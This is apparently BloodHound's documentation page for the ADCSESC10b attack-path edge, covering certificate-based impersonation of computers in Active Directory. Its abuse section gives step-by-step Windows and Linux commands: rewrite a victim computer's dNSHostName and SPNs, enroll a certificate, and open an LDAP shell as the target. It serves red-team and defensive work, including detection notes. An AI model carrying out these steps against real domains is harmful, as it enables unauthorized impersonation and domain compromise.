> ## Documentation Index
> Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.

# ADCSESC10b

> The principal has control over a victim computer with permission to enroll on one or more certificate templates, configured to enable certificate authentication, and require the `dNSHostName` of the enrollee included in the Subject Alternative Name (SAN).

<img noZoom src="https://mintcdn.com/specterops/tTIczgde9H07oLXf/assets/enterprise-AND-community-edition-pill-tag.svg?fit=max&auto=format&n=tTIczgde9H07oLXf&q=85&s=ad49a576589f4d2a8081df77d07fdf56" alt="Applies to BloodHound Enterprise and CE" width="482" height="45" data-path="assets/enterprise-AND-community-edition-pill-tag.svg" />

The victim computer also has enrollment permission for an enterprise CA with the necessary templates published. This enterprise CA is trusted for NT authentication in the forest, and chains up to a root CA for the forest. There is an affected Domain Controller (DC) configured to allow UPN certificate mapping. This setup lets the principal impersonate any AD forest computer without their credentials.

The attacker principal can abuse their control over the victim computer to modify the victim computer's `dNSHostName` attribute to match the `dNSHostName` of a targeted computer. The attacker principal will then abuse their control over the victim computer to obtain the credentials of the victim computer, or a session as the victim computer, and enroll a certificate as the victim in one of the affected certificate templates. The `dNSHostName` of the victim will be included in the issued certificate under SAN DNS name. The UPN certificate mapping configuration on the affected DCs make it possible to authenticate over Schannel as the targeted computer. The DC will split the SAN DNS name into a computer name and a domain name, confirm that the domain name is correct, and use the computer name appended a \$ to identify a computer with matching `sAMAccountName` which the attacker will be authenticated as.

## Abuse Info

### Windows

Step 1: Remove SPNs including `dNSHostName` on victim.

The SPNs of the victim will be automatically updated when you change the `dNSHostName`. AD will not allow the same SPN entry to be set on two accounts. Therefore, you must remove any SPN on the victim account that includes the victim's `dNSHostName`.

Set SPN of the victim computer using PowerView:

```PowerShell theme={null}
Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
```

Step 2: Create .exe version of Certipy.

Install PyInstaller on a host with python installed, clone down Certipy from GitHub, and run this cmdlet from the root of the GitHub repo to bundle the python project into an .exe binary which can be used on Windows computer where Python is not installed:

```bash theme={null}
pyinstaller ./Certipy.spec
```

The Certipy.exe will be in the *dist* folder.

Step 3: Set `dNSHostName` of victim computer to targeted computer's `dNSHostName`.

Set `dNSHostName` of the victim principal using Certipy:

```bash theme={null}
Certipy.exe account update -u ATTACKER@CORP.LOCAL -p PWD -user VICTIM$ -dns TARGET.CORP.LOCAL
```

Step 4: Check if the 'mail' attribute of victim must be set and set it if required.

If the certificate template is of schema version 2 or above, and its attribute 'msPKI-CertificateNameFlag' contains the flag SUBJECT\_REQUIRE\_EMAIL and/or SUBJECT\_ALT\_REQUIRE\_EMAIL, then the victim principal must have their mail attribute set for the certificate enrollment. The CertTemplate BloodHound node will have "Subject Require Email" or "Subject Alternative Name Require Email" set to true if any of the flags are present.

If the certificate template is of schema version 1 or does not have any of the email flags, then
continue to Step 5.

If any of the two flags are present, you will need the victim's mail attribute to be set. The value of
the attribute will be included in the issues certificate but it is not used to identify the target
principal why it can be set to any arbitrary string.

Check if the victim has the mail attribute set using PowerView:

```PowerShell theme={null}
Get-DomainObject -Identity VICTIM -Properties mail
```

If the victim has the mail attribute set, continue to Step 5.

If the victim does not has the mail attribute set, set it to a dummy mail using PowerView:

```PowerShell theme={null}
Set-DomainObject -Identity VICTIM -Set @{'mail'='dummy@mail.com'}
```

Step 5: Obtain a session as victim.  There are several options for this step.

You can obtain a session as SYSTEM on the host, which allows you to interact with AD as the computer account, by abusing control over the computer AD object (see [GenericAll edge](/resources/edges/generic-all) documentation).

Step 6: Enroll certificate as victim.

Use Certipy as the victim principal to request enrollment in the affected template, specifying the affected EnterpriseCA:

```bash theme={null}
Certipy.exe req -u VICTIM$ -p PWD -ca CA-NAME -target CA-SERVER -template TEMPLATE
```

The issued certificate will be saved to disk with the name of the targeted user.

Step 7 (Optional): Set `dNSHostName` and SPN of victim to the previous value.

To avoid issues in the environment, set the `dNSHostName` and SPN of the victim computer back to it's previous values using Certipy and PowerView:

```bash theme={null}
Certipy.exe account update -u ATTACKER@CORP.LOCAL -p PWD -user VICTIM$ -dns VICTIM.CORP.LOCAL
```

```PowerShell theme={null}
Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
```

Step 8: Perform Schannel authentication as targeted principal against affected DC using certificate.

Open an LDAP shell as the victim using Certipy by specifying the certificate created in Step 6 and the IP of an affected DC:

```bash theme={null}
Certipy.exe auth -pfx TARGET.pfx -dc-ip IP -ldap-shell
```

**Linux**

Step 1: Remove SPNs including `dNSHostName` on victim.

The SPNs of the victim will be automatically updated when you change the `dNSHostName`. AD will not allow the same SPN entry to be set on two accounts. Therefore, you must remove any SPN on the victim account that includes the victim's `dNSHostName`.

Remove SPN entries with ldapmodify:

```bash theme={null}
echo -e "dn: VICTIM-DN\nchangetype: modify\ndelete: servicePrincipalName\nservicePrincipalName: SPN" | ldapmodify -x -D "ATTACKER-DN" -w 'PWD' -h DOMAIN-DNS-NAME
```

Step 2: Set `dNSHostName` of victim computer to targeted computer's `dNSHostName`.

Set `dNSHostName` of the victim principal using Certipy:

```bash theme={null}
certipy account update -username ATTACKER@CORP.LOCAL -password PWD -user VICTIM$ -dns TARGET.CORP.LOCAL
```

Step 3: Check if the 'mail' attribute of victim must be set and set it if required.

If the certificate template is of schema version 2 or above, and its attribute 'msPKI-CertificateNameFlag' contains the flag SUBJECT\_REQUIRE\_EMAIL and/or SUBJECT\_ALT\_REQUIRE\_EMAIL, then the victim principal must have their mail attribute set for the certificate enrollment. The CertTemplate BloodHound node will have "Subject Require Email" or "Subject Alternative Name Require Email" set to true if any of the flags are present.

If the certificate template is of schema version 1 or does not have any of the email flags, then
continue to Step 4.

If any of the two flags are present, you will need the victim's mail attribute to be set. The value of
the attribute will be included in the issues certificate but it is not used to identify the target
principal why it can be set to any arbitrary string.

Check if the victim has the mail attribute set using ldapsearch:

```bash theme={null}
ldapsearch -x -D "ATTACKER-DN" -w 'PWD' -h DOMAIN-DNS-NAME -b "VICTIM-DN" mail
```

If the victim has the mail attribute set, continue to Step 4.

If the victim does not has the mail attribute set, set it to a dummy mail using ldapmodify:

```bash theme={null}
echo -e "dn: VICTIM-DN\nchangetype: modify\nreplace: mail\nmail: test@mail.com" | ldapmodify -x -D "ATTACKER-DN" -w 'PWD' -h DOMAIN-DNS-NAME
```

Step 4: Obtain a session as victim.  There are several options for this step.

You can obtain a session as SYSTEM on the host, which allows you to interact with AD as the computer account, by abusing control over the computer AD object (see [GenericAll edge](/resources/edges/generic-all) documentation).

Step 5: Enroll certificate as victim.

Use Certipy as the victim principal to request enrollment in the affected template, specifying the affected EnterpriseCA:

```bash theme={null}
certipy req -u VICTIM@CORP.LOCAL -p PWD -ca CA-NAME -target CA-SERVER -template TEMPLATE
```

The issued certificate will be saved to disk with the name of the targeted user.

Step 6 (Optional): Set `dNSHostName` and SPN of victim to the previous value.

To avoid issues in the environment, set the `dNSHostName` and SPN of the victim computer back to it's previous value using Certipy and ldapmodify:

```bash theme={null}
certipy account update -username ATTACKER@CORP.LOCAL -password PWD -user VICTIM -dns VICTIM.CORP.LOCAL
```

```bash theme={null}
echo -e "dn: VICTIM-DN\nchangetype: modify\nadd: servicePrincipalName\nservicePrincipalName: SPN" | ldapmodify -x -D "ATTACKER-DN" -w 'PWD' -h DOMAIN-DNS-NAME
```

Step 7: Perform Schannel authentication as targeted principal against affected DC using certificate.

Open an LDAP shell as the victim using Certipy by specifying the certificate created in Step 5 and the IP of an affected DC:

```bash theme={null}
certipy auth -pfx TARGET.pfx -dc-ip IP -ldap-shell
```

## Opsec Considerations

When the affected certificate authority issues the certificate to the attacker, it will retain a local copy
of that certificate in its issued certificates store. Defenders may analyze those issued certificates to
identify illegitimately issued certificates and identify the principal that requested the certificate, as
well as the target identity the attacker is attempting to impersonate.

## Edge Schema

Source: [User](/resources/nodes/user), [Group](/resources/nodes/group), [Computer](/resources/nodes/computer)\
Destination: [Domain](/resources/nodes/domain)\
Traversable: **Yes**

## References

This edge is related to the following MITRE ATT\&CK tactic and techniques:

* [https://attack.mitre.org/techniques/T1649/](https://attack.mitre.org/techniques/T1649/)

### Abuse and Opsec references

* [Certipy](https://github.com/ly4k/Certipy)
* [Certipy 4.0](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
* [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/)
* [LDAPSearch](https://linux.die.net/man/1/ldapsearch)
* [LDAPModify](https://linux.die.net/man/1/ldapmodify)
* [ADCS Attack Paths in BloodHound—Part 3](https://specterops.io/blog/2024/09/11/adcs-attack-paths-in-bloodhound-part-3/)